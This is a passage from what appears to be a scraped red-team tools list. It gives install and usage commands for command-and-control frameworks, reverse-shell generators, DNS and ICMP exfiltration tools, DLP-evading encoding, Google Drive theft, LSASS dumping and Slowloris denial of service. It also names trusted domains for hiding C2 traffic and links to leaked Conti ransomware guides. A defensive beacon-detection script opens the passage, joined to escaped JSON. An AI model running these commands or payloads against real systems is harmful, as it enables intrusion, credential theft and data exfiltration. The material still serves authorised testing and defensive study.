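        if len(stamps) < min_hits:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        mean = statistics.mean(gaps)
        cv = statistics.stdev(gaps) / mean if mean > 0 else float("inf")
        if cv <= max_cv:
            findings.append({"client": client, "host": host, "hits": len(stamps),
                             "mean_interval_s": round(mean, 1), "cv": round(cv, 3)})
    return sorted(findings, key=lambda f: (f["client"], f["host"]))


def analyze(text):
    """Run both checks over a log and return their findings."""
    recs = parse_log(text)
    return {"rare_hosts": rare_hosts(recs), "beacons": beacon_candidates(recs)}


if __name__ == "__main__":
    for name, hits in analyze(SAMPLE_LOG).items():
        print(name, hits)
```

On the sample, the rarity check names only cdn-edge-7731.example.net, while the interval check names both of 10.0.0.5's destinations. Adding 20-30% jitter to the beacon sleep pushes the cv above the threshold used here, which is why real implants make jitter configurable and why defenders add byte-count and long-tail checks on top of timing.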
Additionally, web proxies may block connections to untrusted or uncategorised domains outright.\n\nHiding your C2 traffic behind a trusted domain helps you stay undetected and reduces the likelihood of being blocked at the proxy level. It does not hide the traffic's shape: a beacon that checks in at a fixed interval, or uploads far more than a normal user of that service, is still visible in proxy logs.\n\nThis resource contains a list of trusted sites that can be used. \n\n**Usage:** \n\nVisit [https://lots-project.com/](https://lots-project.com/)\n\nSearch for `+C\u0026C` in the search bar to view all potential domains / subdomains that can be used for command and control operations.\n\nResults include:\n\n- raw.githubusercontent.com\n- docs.google.com\n- *.azurewebsites.net\n- dropbox.com\n- *.amazonaws.com\n\n![image](https://user-images.githubusercontent.com/100603074/220959716-85a7f403-95af-441b-9cbf-f6c278be6652.png)\n\n*Image used from https://lots-project.com/*\n\n### [🔙](#tool-list)[Havoc](https://github.com/HavocFramework/Havoc)\n\nHavoc is a modern and malleable post-exploitation command and control framework, created by [@C5pider](https://twitter.com/C5pider).\n\nFeatures include: sleep obfuscation, x64 return address spoofing, indirect syscalls for Nt* APIs.\n\n**Pre-requisites: (Client, Ubuntu 20.04 / 22.04)** \n\n```bash\nsudo apt install build-essential\nsudo add-apt-repository ppa:deadsnakes/ppa\nsudo apt update\nsudo apt install python3.10 python3.10-dev\n```\n\n**Build + Usage: (Client)**\n\n```bash\ngit clone https://github.com/HavocFramework/Havoc.git\ncd Havoc/Client\nmake\n./Havoc\n```\n\n**Pre-requisites: (Teamserver)**\n\n```bash\ncd Havoc/Teamserver\ngo mod download golang.org/x/sys\ngo mod download github.com/ugorji/go\n```\n\n**Build + Usage: (Teamserver)**\n\n```bash\n# still in Havoc/Teamserver\n./Install.sh\nmake\n./teamserver -h\n```\n\n**Run the teamserver**\n\n```bash\nsudo ./teamserver server --profile ./profiles/havoc.yaotl -v --debug\n```\n\nThe profile defines the operator accounts and passwords the client logs in with; change the defaults in `profiles/havoc.yaotl` before exposing the teamserver port to anything but the operator network.\n\n*Full install, build and run instructions on the 
[wiki](https://github.com/HavocFramework/Havoc/blob/main/WIKI.MD)*\n\n![image](https://user-images.githubusercontent.com/100603074/206025215-9c7093e5-b45a-4755-81e6-9e2a52a1f455.png)\n\n### [🔙](#tool-list)[Covenant](https://github.com/cobbr/Covenant)\n\nCovenant is a .NET command and control framework, it has a web interface that allows for multi-user collaboration.\n\nIt can be used to remotely control compromised systems and perform a variety of different tasks, including executing arbitrary code, capturing keystrokes, exfiltrating data, and more.\n\n**Install: (Dotnet Core)** \n\nYou can download dotnet core for your platform from [here](https://dotnet.microsoft.com/download/dotnet-core/3.1).\n\n**Note:** *After starting Covenant, you must register an initial user through the web interface. Navigating to the web interface will allow you to register the initial user*\n\n```bash\ngit clone --recurse-submodules https://github.com/cobbr/Covenant\ncd Covenant/Covenant\n```\n\n**Usage: (Dotnet Core)** \n\n```bash\n~/Covenant/Covenant \u003e dotnet run\nwarn: Microsoft.EntityFrameworkCore.Model.Validation[10400]\n      Sensitive data logging is enabled. Log entries and exception messages may include sensitive application data, this mode should only be enabled during development.\nWARNING: Running Covenant non-elevated. You may not have permission to start Listeners on low-numbered ports. Consider running Covenant elevated.\nCovenant has started! 
Navigate to https://127.0.0.1:7443 in a browser\n```\n\n**Install: (Docker)**\n\n```bash\n# Build the docker image:\ngit clone --recurse-submodules https://github.com/cobbr/Covenant\ncd Covenant/Covenant\n~/Covenant/Covenant \u003e docker build -t covenant .\n```\n\n**Usage: (Docker)** \n\n```bash\n# Run Covenant within the Docker container (the Data volume keeps the database and generated grunts across restarts)\n~/Covenant/Covenant \u003e docker run -it -p 7443:7443 -p 80:80 -p 443:443 --name covenant -v \u003c/absolute/path/to/Covenant/Covenant/Data\u003e:/app/Data covenant\n\n# Stop the container\n~/Covenant/Covenant \u003e docker stop covenant\n\n# Restart Covenant interactively\n~/Covenant/Covenant \u003e docker start covenant -ai\n```\n\nThe first user registered through the web interface becomes the administrator, so register right after starting and keep port 7443 reachable from the operator network only.\n\nFull installation and startup instructions can be found on the wiki [here](https://github.com/cobbr/Covenant/wiki/Installation-And-Startup).\n\n![image](https://user-images.githubusercontent.com/100603074/210168138-58473fc0-4361-41ec-9439-2f2fcb159520.png)\n\n*Image from https://github.com/cobbr/Covenant*\n\n### [🔙](#tool-list)[Merlin](https://github.com/Ne0nd0g/merlin)\n\nMerlin is an open-source post-exploitation framework designed to be used after an initial compromise of a system.\n\nIt is written in Go, so server and agent compile to static binaries for Windows, Linux and macOS, and it can be used to perform a variety of tasks such as executing arbitrary code, moving laterally through a network and exfiltrating data. Agents talk to the server over HTTP/1.1, HTTP/2 or HTTP/3 (QUIC).\n\n**Install:** \n\n1. Download the latest compiled version of Merlin Server from the [releases](https://github.com/Ne0nd0g/merlin/releases) section\n2. Extract the files with 7zip (`7z x`); the archive password is `merlin`\n3. Start Merlin\n4. Configure a [listener](https://merlin-c2.readthedocs.io/en/latest/server/menu/listeners.html)\n5. Deploy an agent. See [Agent Execution Quick Start Guide](https://merlin-c2.readthedocs.io/en/latest/quickStart/agent.html) for examples\n\n```bash\nmkdir /opt/merlin; cd /opt/merlin\nwget https://github.com/Ne0nd0g/merlin/releases/latest/download/merlinServer-Linux-x64.7z\n7z x merlinServer-Linux-x64.7z -pmerlin\nsudo ./merlinServer-Linux-x64\n```\n\n**Usage:** \n\n1. Ensure the Merlin server is running with a configured listener\n2. Download and deploy an agent to the victim\n3. Execute the agent\n\nFor detailed usage information see the official Merlin [wiki](https://merlin-c2.readthedocs.io/en/latest/server/menu/main.html).\n\n![image](https://user-images.githubusercontent.com/100603074/210168329-57c77e4f-213c-4402-8dd8-70ac3bcabcfe.png)\n\n*Image from https://www.foregenix.com/blog/a-first-look-at-todays-command-and-control-frameworks*\n\n### [🔙](#tool-list)[Metasploit Framework](https://github.com/rapid7/metasploit-framework)\n\nMetasploit is an open-source framework for developing, testing, and using exploit code.\n\nThe framework includes a large number of pre-built exploits, auxiliary modules and payloads, the `msfconsole` interface for driving them, and a Ruby module API plus `msfvenom` for building custom exploits and payloads.\n\n**Install: (Installer)** \n\n```bash\n# The wrapper script installs the Rapid7 nightly packages under /opt/metasploit-framework; read it before running, it needs root\ncurl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb \u003e msfinstall \u0026\u0026 \\\n  chmod 755 msfinstall \u0026\u0026 \\\n  ./msfinstall\n```\n\n**Usage:** \n\n```bash\n/opt/metasploit-framework/bin/msfconsole\n```\n\nFull installation instructions can be found on the official [wiki](https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html).\n\n[Rapid7 Metasploit blogs](https://www.rapid7.com/blog/tag/metasploit/)\n\n[Cheat sheet graphic](https://cdn.comparitech.com/wp-content/uploads/2019/06/Metasploit-Cheat-Sheet.webp)\n\n[Nice command 
list](https://github.com/security-cheatsheet/metasploit-cheat-sheet)\n\n![image](https://user-images.githubusercontent.com/100603074/210168463-f1ac1edb-2f0e-4008-a8ba-308f3a741a9e.png)\n\n*Image used from https://goacademy.io/how-to-install-metasploit-on-kali-linux/*\n\n### [🔙](#tool-list)[Pupy](https://github.com/n1nj4sec/pupy)\n\nPupy is an open-source, cross-platform (Windows, Linux, OSX, Android) C2 and post-exploitation framework written in Python and C.\n\nIt allows an attacker to remotely control a victim's computer and execute various actions, such as command execution, key logging and taking screenshots.\n\n**Install: (Git)** \n\nThese steps are for the legacy Python 2 build; the packages named below (`libssl1.0-dev`, `python-pip`) are no longer shipped by current Debian/Ubuntu releases, so on a recent system prefer the Docker instructions linked further down.\n\n```bash\nsudo apt install git libssl1.0-dev libffi-dev python-dev python-pip build-essential swig tcpdump python-virtualenv\ngit clone --recursive https://github.com/n1nj4sec/pupy\ncd pupy\n# -D skips compiling the payload templates locally, -G downloads prebuilt ones from GitHub releases; pupyw is the workspace directory\npython create-workspace.py -DG pupyw\n```\n\nIf `create-workspace.py` fails on the rpyc version, pin it and re-run:\n\n```bash\nsudo pip2 install rpyc==3.4.4\n```\n\nStart the shell from the workspace created above:\n\n```bash\nexport PATH=$PATH:~/.local/bin; pupysh   # if a launcher was installed there\npupyw/bin/pupysh                          # or run it straight from the workspace\n```\n\n*Git install instructions used from [here](https://kalitut.com/how-to-install-pupy/).*\n\n**Install: (Docker)** \n\nFor detailed Docker and Pupy installation instructions see the [wiki](https://github.com/n1nj4sec/pupy/wiki/Installation).\n\n**Usage:** \n\n```bash\n# Get the help page for any built-in command with -h\n\u003e\u003e sessions -h\n\u003e\u003e jobs -h\n\u003e\u003e run -h\n\n# Interact with session 1\n\u003e\u003e sessions -i 1\n\n# Run the local command 'ls' on the operator host (! prefix)\n\u003e\u003e !ls\n```\n\nFull usage information can be found on the [wiki](https://github.com/n1nj4sec/pupy/wiki/Basic-Usage).\n\nThe wiki contains good [post exploitation information](https://github.com/n1nj4sec/pupy/wiki/Post-Exploitation).\n\n![image](https://user-images.githubusercontent.com/100603074/210181480-d1ad1bd8-fa8d-4014-842c-3efbb35b2644.png)\n\n*Image used from https://github.com/n1nj4sec/pupy/wiki/Screenshots*\n\n### [🔙](#tool-list)[Brute 
Ratel](https://bruteratel.com/)\n\nBruteRatel is a great command and control (C4) framework created by [@NinjaParanoid](https://twitter.com/NinjaParanoid). The framework consists of a client component 'badger' that is installed on the compromised system, and a server component 'commander' that is run by the red team.\n\nThe client and server communicate with each other using various communication channels, such as HTTP, DNS, or TCP, and can be configured to use different encoding and encryption methods to evade detection.\n\nSome nice features:\n\n- DNS Over HTTPS\n- Indirect Syscalls\n- Built-in Debugger To Detect EDR Userland Hooks\n- MITRE graph integration\n- Adversary TTP automation\n\n**Install:** \n\nTo legally get access to the framework you will need to buy a licence (1 Year $2500 per user). See the [pricing page](https://bruteratel.com/pricing/) for more information.\n\nAfter purchase you can download the framework from [here](https://bruteratel.com/tabs/download/) with your Activation Key and License User ID.\n\n**Usage:** \n\n```bash\n# Loads a powershell script to memory which can be Invoked using psreflect\npsimport\n\n# Locks keyboard and mouse hardware input. 
Use ‘unlock_input’ command to unlock\nlock_input\n\n# Dumps user clipboard\ndumpclip\n\n# Enumerates basic domain information\ndcenum\n\n# Elevates user privileges to SYSTEM (requires admin rights)\nget_system\n\n# Takes a screenshot of the current desktop and stores it on the server\nscreenshot\n\n# Dumps LSASS to C:\\Windows\\Memory.DMP using the PssCaptureSnapshot technique (the dump lands on disk, so collect it and delete it)\nshadowclone\n```\n\nFull commander terminal usage information can be found [here](https://bruteratel.com/tabs/badger/badgers/).\n\n![image](https://user-images.githubusercontent.com/100603074/210181655-74201cad-a782-43ed-97d3-f4c0926d46c3.png)\n\n*Image used from https://bruteratel.com/*\n\n### [🔙](#tool-list)[NimPlant](https://github.com/chvancooten/NimPlant)\n\nA light-weight first-stage C2 implant written in Nim.\n\nFeatures:\n\n- Lightweight and configurable implant written in the Nim programming language\n- Encryption and compression of all traffic by default, obfuscates static strings in implant artefacts\n- Support for several implant types, including native binaries (exe/dll), shellcode or self-deleting executables\n- Easy deployment of more advanced functionality or payloads via `inline-execute`, `shinject` (using dynamic invocation), or in-thread `execute-assembly`\n- Comprehensive logging of all interactions and file operations\n\n**Install:** \n\n```bash\n# Nim toolchain\ncurl https://nim-lang.org/choosenim/init.sh -sSf | sh\nchoosenim stable\n# Implant (Nim) dependencies\ngit clone https://github.com/chvancooten/NimPlant\ncd NimPlant/client\nnimble install -d\n# Server (Python) dependencies and the cross-compiler for Windows payloads\ncd ..\npip3 install -r server/requirements.txt\napt install mingw-w64\n```\n\n**Usage:** \n\n```bash\n# Generate payloads (run from the NimPlant directory)\npython3 NimPlant.py compile all\n\n# Start the server\npython3 NimPlant.py server\n```\n\nBefore running, make sure to create and edit the `config.toml` configuration file (listener address, port and implant settings); more information can be found [here](https://github.com/chvancooten/NimPlant#getting-started).\n\nFull usage information can be found [here](https://github.com/chvancooten/NimPlant#usage).\n\n[Blog - 
Building a C2 Implant in Nim - Considerations and Lessons Learned](https://casvancooten.com/posts/2021/08/building-a-c2-implant-in-nim-considerations-and-lessons-learned/)\n\n![image](https://user-images.githubusercontent.com/100603074/220959859-d930b110-c774-4b4c-b004-e4a85a6214ba.png)\n\n*Image used from https://casvancooten.com*\n\n### [🔙](#tool-list)[Hoaxshell](https://github.com/t3l3machus/hoaxshell)\n\nA Windows reverse shell payload generator and handler that abuses the http(s) protocol to establish a beacon-like reverse shell.\n\n**Install:** \n\n```bash\ngit clone https://github.com/t3l3machus/hoaxshell\ncd ./hoaxshell\nsudo pip3 install -r requirements.txt\nchmod +x hoaxshell.py\n```\n\n**Usage:** \n\n```bash\n# Payload that utilizes Invoke-Expression (default)\nsudo python3 hoaxshell.py -s \u003cyour_ip\u003e\n\n# Payload that writes and executes commands from a file\nsudo python3 hoaxshell.py -s \u003cyour_ip\u003e -x \"C:\\Users\\\\\\$env:USERNAME\\.local\\hack.ps1\"\n\n# Encrypted shell session with a trusted certificate\nsudo python3 hoaxshell.py -s \u003cyour.domain.com\u003e -t -c \u003c/path/to/cert.pem\u003e -k \u003cpath/to/key.pem\u003e\n```\n\nFull usage documentation [here](https://github.com/t3l3machus/hoaxshell#usage).\n\n[Usage Demo - YouTube](https://www.youtube.com/watch?v=SEufgD5UxdU)\n\n[Hoaxshell vs AV](https://github.com/t3l3machus/hoaxshell#av-bypass-pocs)\n\n![image](https://user-images.githubusercontent.com/100603074/229649767-817d838c-891d-4a33-b494-9249f3a2f404.png)\n\n*Image used from https://github.com/t3l3machus/hoaxshell*\n\nExfiltration\n====================\n\n### [🔙](#tool-list)[Dnscat2](https://github.com/iagox86/dnscat2)\n\nA tool for establishing C2 connections via DNS, even if the attacker and victim machines are behind a firewall / network address translation (NAT).\n\nThe tool is designed to be stealthy and difficult to detect, as it uses legitimate DNS traffic to transmit data.\n\n**Install: (Compile - Server)** 
\n\n```bash\ngit clone https://github.com/iagox86/dnscat2.git\ncd dnscat2/server/\ngem install bundler\nbundle install\n```\n\n**Install: (Compile - Client)** \n\n```bash\ngit clone https://github.com/iagox86/dnscat2.git\ncd dnscat2/client/\nmake\n```\n\nFull installation information can be found in the [Installation Section](https://github.com/iagox86/dnscat2#compiling).\n\n**Usage: (Server)** \n\n```bash\n# Establish the server; port 53 needs root, and DOMAIN.COM must have an NS record delegating to this host\nsudo ruby ./dnscat2.rb DOMAIN.COM\n\n# Require a pre-shared secret so that only your clients can connect (the session is encrypted either way)\nsudo ruby ./dnscat2.rb DOMAIN.COM --secret=s3cr3t\n```\n\n**Usage: (Client)** \n\nThe compiled client binary is `dnscat`.\n\n```bash\n# Establish the client via the authoritative domain (queries travel through the victim's normal resolver)\n./dnscat DOMAIN.COM\n\n# Establish the client without an authoritative domain, talking straight to the server's IP\n./dnscat --dns server=SERVER_IP,port=53\n\n# Ping the server from the client\n./dnscat --ping DOMAIN.COM\n\n# Ping the server from the client, with a custom DNS resolver IP\n./dnscat --dns server=RESOLVER_IP,domain=DOMAIN.COM --ping\n\n# Match the server's secret\n./dnscat DOMAIN.COM --secret=s3cr3t\n```\n\n**Usage: (Tunnels)** \n\nOnce a client has connected, interact with its session in the server console and open tunnelled ports from there:\n\n```bash\n# Open a new tunnelled port (typed in the session's command window on the server)\nlisten [lhost:]lport rhost:rport\n\n# Forward ssh connections through the dnscat2 client to an internal device\nlisten 127.0.0.1:2222 10.10.10.10:22\n```\n\nFull usage information can be found in the [Usage Section](https://github.com/iagox86/dnscat2#usage). \n\n![image](https://user-images.githubusercontent.com/100603074/210116521-0ef905ec-cc14-4cdc-9831-46bbded8c6af.png)\n\n### [🔙](#tool-list)[Cloakify](https://github.com/TryCatchHCF/Cloakify)\n\nWhen exfiltrating victim files, DLP (Data Loss Prevention) solutions will typically trigger on strings within these files. Cloakify reduces this risk by transforming the data.\n\nCloakify transforms any filetype (e.g. .zip, .exe, .xls, etc.) into a list of harmless-looking strings. 
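The transformation Cloakify performs, re-implemented here as an added example rather than the project's own code: base64-encode the payload, then replace each of the 66 base64 symbols with a line from a cipher list. The cipher list and the secret file are constructed for the example (Cloakify ships its own lists such as ciphers/desserts.ciph, and its exact symbol ordering is not assumed here); the toy DLP patterns show what the transform hides from a string-matching gateway.

```python
import base64
import re

BASE64_ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="

# Constructed cipher list: 66 distinct benign-looking phrases, one per base64
# symbol. Cloakify ships its own lists (ciphers/desserts.ciph etc.); this one is
# made up here so the example runs without the repository.
_ADJ = ["warm", "sweet", "crisp", "golden", "chilled", "frosted",
        "toasted", "glazed", "spiced", "baked", "whipped"]
_NOUN = ["brownie", "waffle", "eclair", "scone", "tart", "muffin"]
CIPHER = [f"{adj} {noun}" for adj in _ADJ for noun in _NOUN]

# Constructed "sensitive" file content; the AKIA value is the AWS documentation example key.
SECRET = b"aws_access_key_id = AKIAIOSFODNN7EXAMPLE\npassword = hunter2\n"

# Toy DLP rules of the kind a gateway applies to outbound text.
DLP_PATTERNS = (r"AKIA[0-9A-Z]{16}", r"(?i)password\s*=")


def _check_cipher(cipher):
    if len(cipher) != 66 or len(set(cipher)) != 66:
        raise ValueError("cipher needs exactly 66 unique entries, one per base64 symbol")


def cloakify(data, cipher=CIPHER):
    """Base64-encode the bytes, then substitute every symbol with its cipher line."""
    _check_cipher(cipher)
    table = dict(zip(BASE64_ALPHABET, cipher))
    return [table[ch] for ch in base64.b64encode(data).decode("ascii")]


def decloakify(lines, cipher=CIPHER):
    """Reverse the substitution and base64-decode; a line outside the cipher is an error."""
    _check_cipher(cipher)
    table = dict(zip(cipher, BASE64_ALPHABET))
    symbols = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        if line not in table:
            raise ValueError(f"line not in cipher: {line!r}")
        symbols.append(table[line])
    return base64.b64decode("".join(symbols), validate=True)


def dlp_hits(text, patterns=DLP_PATTERNS):
    """Which DLP patterns match the text (an empty list means it would pass)."""
    return [p for p in patterns if re.search(p, text)]


if __name__ == "__main__":
    cloaked = cloakify(SECRET)
    print("\n".join(cloaked[:8]), "...")
    print("plain hits:  ", dlp_hits(SECRET.decode()))
    print("cloaked hits:", dlp_hits("\n".join(cloaked)))
    assert decloakify(cloaked) == SECRET
```

Two properties follow directly from the construction: the output is many times larger than the input (four base64 symbols per three bytes, each expanded to a whole line), and it is a substitution rather than encryption, so anyone holding the cipher list recovers the file. A gateway that decodes base64 gains nothing here, but one that profiles word frequency, or simply knows the published cipher vocabularies, can still catch it.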
This lets you hide the file in plain sight, and transfer the file without triggering alerts.\n\n**Note:** You can make your own ciphers, see [here](https://github.com/TryCatchHCF/Cloakify#create-your-own-cipers) for more info.\n\n**Install:** \n\n```bash\ngit clone https://github.com/TryCatchHCF/Cloakify\n```\n\n**Usage:** \n\n```bash\n# Cloakify some text\npython3 cloakify.py TEXT.txt ciphers/desserts.ciph \u003e TEXT.cloaked\n\n# De-Cloakify the text\npython3 decloakify.py TEXT.cloaked ciphers/desserts.ciph\n```\n\n![image](https://user-images.githubusercontent.com/100603074/210117067-4611a42a-2ac7-44af-8aee-2e448c05909b.png)\n\n![image](https://user-images.githubusercontent.com/100603074/210116996-8ec36a12-8eef-44e9-924a-ad179e599910.png)\n\n### [🔙](#tool-list)[PyExfil](https://github.com/ytisf/PyExfil)\n\n\"An Alpha-Alpha stage package, not yet tested (and will appreciate any feedbacks and commits) designed to show several techniques of data exfiltration is real-world scenarios.\"\n\n**Install:** \n\n```bash\ngit clone https://www.github.com/ytisf/PyExfil;cd PyExfil;pip install -r requirements.txt;pip install py2exe;pip setup.py install\n```\n\n**Usage:** (Full Usage [here](https://github.com/ytisf/PyExfil/blob/master/USAGE.md))\n\n#### HTTP Cookies\n\n```python\nfrom pyexfil.network.HTTP_Cookies.http_exfiltration import send_file, listen\n\n# For Client (exfil)\nsend_file(addr='http://www.morirt.com', file_path=FILE_TO_EXFIL)\n\n# For Server (collecting)\nlisten(local_addr='127.0.0.1', local_port=80)\n```\n\n#### ICMP Echo 8\n\n```python\nfrom pyexfil.network.ICMP.icmp_exfiltration import send_file, init_listener\n\n# For Client (exfil)\nip_addr = \"127.0.0.1\"\nsend_file(ip_addr, src_ip_addr=\"127.0.0.1\", file_path=\"\", max_packetsize=512, SLEEP=0.1)\n\n# For Server (collecting)\ninit_listener(ip_addr, saving_location=\"/tmp/\")\n```\n\n#### NTP Request\n\n```python\nfrom pyexfil.network.NTP.ntp_exfil import exfiltrate, ntp_listen, NTP_UDP_PORT\n\n# For 
Client (exfil)\nip_addr = \"127.0.0.1\"\nexfiltrate(\"/etc/passwd\", ip_addr, time_delay=0.1)\n\n# For Server (collecting) - uses the ntp_listen function imported above\nntp_listen(ip=\"0.0.0.0\", port=NTP_UDP_PORT)\n```\n\n![image](https://user-images.githubusercontent.com/100603074/206573575-e90384c4-4a39-4f3c-96ec-face1f191808.png)\n\n### [🔙](#tool-list)[Powershell RAT](https://github.com/Viralmaniar/Powershell-RAT)\n\nPython-based backdoor that uses Gmail to exfiltrate data as an e-mail attachment. It tracks user activity using screen capture and sends the information to an attacker as an e-mail attachment.\n\n**Install:** \n\n```bash\ngit clone https://github.com/Viralmaniar/Powershell-RAT\n```\n\n**Usage:** (Full Usage [here](https://github.com/Viralmaniar/Powershell-RAT/blob/master/README.md))\n\n#### Setup\n\n- Throwaway Gmail address\n- Enable \"Allow less secure apps\" by going to https://myaccount.google.com/lesssecureapps\n- Modify the `$username` \u0026 `$password` variables for your account in the Mail.ps1 Powershell file\n- Modify `$msg.From` \u0026 `$msg.To.Add` with the throwaway Gmail address\n\n![image](https://user-images.githubusercontent.com/100603074/210267906-68a2e852-d7b5-4b61-a747-77844e1d7d99.png)\n\n### [🔙](#tool-list)[GD-Thief](https://github.com/antman1p/GD-Thief)\n\nTool for exfiltrating files from a target's Google Drive that you have access to, via Google's API.\n\nThis includes all shared files, all files from shared drives, and all files from domain drives that the target has access to.\n\n**Install:** \n\n```bash\ngit clone https://github.com/antman1p/GD-Thief.git\ncd GD-Thief\npip install --upgrade google-api-python-client google-auth-httplib2 google-auth-oauthlib\n```\n\nthen...\n\n1. Create a new Google Cloud Platform (GCP) project\n2. Enable a Google Workspace API\n3. Configure OAuth Consent screen\n4. Create a credential\n5. 
Add the victim's Google account to the Application's Test Users\n\nFor detailed setup instructions see the [How To Guide](https://github.com/antman1p/GD-Thief#how-to).\n\n**Usage:** \n\n```bash\nusage:\npython3 gd_thief.py [-h] -m [{dlAll, dlDict[-d \u003cDICTIONARY FILE PATH\u003e]}\n\t[-t \u003cTHREAD COUNT\u003e]\n\nhelp:\n\nThis Module will connect to Google's API using an access token and exfiltrate files\nfrom a target's Google Drive.  It will output exfiltrated files to the ./loot directory\n\narguments:\n        -m [{dlAll, dlDict}],\n                --mode [{dlAll, dlDict}]\n                The mode of file download\n                Can be \"dlAll\", \"dlDict [-d \u003cDICTIONARY FILE PATH\u003e]\", or... (More options to come)\n\noptional arguments:\n        -d \u003cDICTIONARY FILE PATH\u003e, --dict \u003cDICTIONARY FILE PATH\u003e\n                        Path to the dictionary file. Mandatory with download mode\"-m, --mode dlDict\"\n                        You can use the provided dictionary, per example: \"-d ./dictionaries/secrets-keywords.txt\"\n        -t \u003cTHREAD COUNT\u003e, --threads \u003cTHREAD COUNT\u003e\n                        Number of threads. (Too many could exceeed Google's rate limit threshold)\n\n        -h, --help\n                show this help message and exit\n```\n\nNice [blog post](https://antman1p-30185.medium.com/youre-a-gd-thief-1e02358fd557) explaining the logic behind the tool.\n\nImpact\n====================\n\n### [🔙](#tool-list)[Conti Pentester Guide Leak](https://github.com/ForbiddenProgrammer/conti-pentester-guide-leak)\n\nConti is a ransomware group that is known for targeting large organizations and using sophisticated tactics to evade detection and maximize the impact of their attacks. \n\nConti has been responsible for a number of high-profile ransomware attacks, including ones against the computer systems of the City of Pensacola, Florida, and the computer systems of the Irish health service. 
\n\nThe [Conti Pentester Guide Leak - Repository](https://github.com/ForbiddenProgrammer/conti-pentester-guide-leak) contains leaked pentesting materials given to Conti ransomware group affiliates.\n\nTopics include:\n\n- Configuring Rclone with MEGA for data exfiltration\n- Configuring AnyDesk for persistence and remote access into a victim’s network\n- Elevating and gaining admin rights inside a company’s hacked network\n- Taking over domain controllers\n- Dumping passwords from Active Directory\n\n**Note:** *[vx-underground.org](https://www.vx-underground.org/) obtained more training materials and tools used by Conti ransomware operators [here](https://share.vx-underground.org/Conti/).*\n\n![image](https://user-images.githubusercontent.com/100603074/210856582-44a9bf16-23d4-4b7e-9e91-8604c3191e78.png)\n\n*Image used from https://github.com/ForbiddenProgrammer/conti-pentester-guide-leak*\n\n### [🔙](#tool-list)[SlowLoris](https://github.com/gkbrk/slowloris)\n\nSlowloris is a type of denial-of-service (DoS) attack that involves sending HTTP requests to a web server in a way that ties up the server's resources, preventing it from being able to process legitimate requests. 
\n\nThis attack would typically be conducted with a botnet. It is designed to be difficult to detect and mitigate, as it uses a relatively small number of connections and does not generate a large amount of traffic.\n\n**Install: (Pip)** \n\n```bash\nsudo pip3 install slowloris\n```\n\n**Install: (Git)** \n\n```bash\ngit clone https://github.com/gkbrk/slowloris.git\ncd slowloris\n```\n\n**Usage:** \n\n```bash\n# Pip\nslowloris example.com\n\n# Git\npython3 slowloris.py example.com\n```\n\n![image](https://user-images.githubusercontent.com/100603074/210115630-b6541ee0-ad82-471a-9a7e-7f0ec028c67d.png)\n\n### [🔙](#tool-list)[usbkill](https://github.com/hephaest0s/usbkill)\n\nThis is an anti-forensic kill-switch that waits for a change in USB port status, immediately shutting down the endpoint if a change is detected.\n\nIn some situations, it is imperative that no data is added or removed from an endpoint via USB.\n\nThis is where USBkill comes in.\n\n**Install:** \n\n```bash\ngit clone https://github.com/hephaest0s/usbkill\ncd usbkill\n./setup.py install\n```\n\n**Usage:** \n\n```bash\nsudo python3 usbkill.py\n```\n\n![image](https://user-images.githubusercontent.com/100603074/217654429-98efef6d-b70f-48b8-8979-228ce2f78932.png)\n\n*Image used from https://en.wikipedia.org/wiki/USBKill*\n\n### [🔙](#tool-list)[Keytap](https://github.com/ggerganov/kbd-audio)\n\nThis is a tool that can guess the pressed keyboard keys from the audio of a computer's microphone.\n\nKeytap2 can also be used to retrieve text from audio snippets of keyboard typing.\n\n**Install: (Build)** \n\n```bash\ngit clone https://github.com/ggerganov/kbd-audio\ncd kbd-audio\ngit submodule update --init\nmkdir build \u0026\u0026 cd build\ncmake ..\nmake\n```\n\n**Usage:**\n\n```bash\n# Record audio to a raw binary file on disk\n./record-full output.kbd [-cN]\n\n# Playback a recording captured via the record-full tool\n./play-full input.kbd [-pN]\n\n# Record audio only while typing (Useful for collecting training 
data for keytap)\n./record output.kbd [-cN] [-CN]\n```\n\nSee full usage documentation [here](https://github.com/ggerganov/kbd-audio#tool-details).\n\nTry the online demo at [https://keytap.ggerganov.com/](https://keytap.ggerganov.com/).\n\n![image](https://user-images.githubusercontent.com/100603074/229649861-728e7ebb-ddb9-4347-9934-dd077d12bb41.png)\n\n*Image used from https://github.com/ggerganov/kbd-audio*\n","funding_links":[],"categories":["Others","cheatsheet","HarmonyOS","windows","Pentesting","Misc"],"sub_categories":["Windows Manager","Red Team"],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FA-poc%2FRedTeam-Tools","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FA-poc%2FRedTeam-Tools","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FA-poc%2FRedTeam-Tools/lists"}